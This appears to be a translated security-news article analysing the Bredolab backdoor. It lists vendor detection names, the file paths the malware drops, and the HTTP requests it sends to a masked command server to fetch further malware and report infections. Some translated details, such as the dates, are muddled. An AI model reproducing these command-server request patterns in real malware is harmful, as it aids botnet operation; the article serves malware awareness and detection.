Learn about Backdoor.Win32.Bredolab.eua malware

QuanTriMang.com - The concept of backdoor is used to refer to malicious software, created to install and distribute malicious code to the user's computer . In terms of functions and techniques, the Backdoor is quite similar to the software management and coordination system. These malicious applications were created to do whatever the hackers wanted: to send and receive data, activate, use and delete any file, display error messages, and restart automatically. computer …

Such programs are often used to link infected computer groups to create common botnet or zombie models. And the people behind this organization can easily gather a large or large number of computers - this has now become a tool for hackers, in order to carry out bad schemes or purposes.

Another Backdoor unit is also capable of spreading and acting exactly like the Net-Worm, we can distinguish them through the ability to spread, Backdoor cannot replicate and spread, in stark contrast to Net-Worm. But just by receiving a special command from the hackers, they will simultaneously spread and produce in an uncontrollable amount.

In this article, we will discuss Backdoor.Win32.Bredolab.eua (named by Kaspersky), or also known as:

- Trojan: Bredolab! N (McAfee)
- Mal / BredoPk-B (Sophos)
- Trj / Sinowal.DW (Panda)
- TrojanDownloader: Win32 / Bredolab.AA (MS (OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32 / TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR / Crypt.XPACK.Gen (AVIRA)
- W32 / Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)

They were discovered on June 3, 2010 at 16:16 GMT, the 'move' operated at 4/6/2010 at 3:28 GMT, and detailed analysis information was posted on 12/12 7/2010 at 11:33 GMT.

Detailed technical description

In essence, malicious programs like this are often managed by a private server, and are responsible for downloading other malware to the infected computer.

Like all other malicious programs, they activate the same boot mechanism by copying the executable file to the autorun folder:

% Startup% siszpe32.exe

and create files that look like this:

% appdata% avdrn.dat

Regarding the Payload method, they often connect to the server:

http:///*****lo.ru

where they send the following requests:

GET /new/controller.php?action=bot&entity_list=&
uid = & first = 1 & guid = 880941764 & v = 15 & rnd = 8520045

As a result, the program will receive specific commands and codes to download other malware applications, they will be saved in the following folder and automatically activated:

% windir% Temp.exe

Then they continue to send other requests:

GET /new/controller.php?
action = report & guid = 0 & rnd = 8520045 & guid = & entity = 1260187840: unique_start;
1260188029: unique_start; 1260433697: unique_start; 1260199741: unique_start

These data inform the server system that the victim's computer has been infected.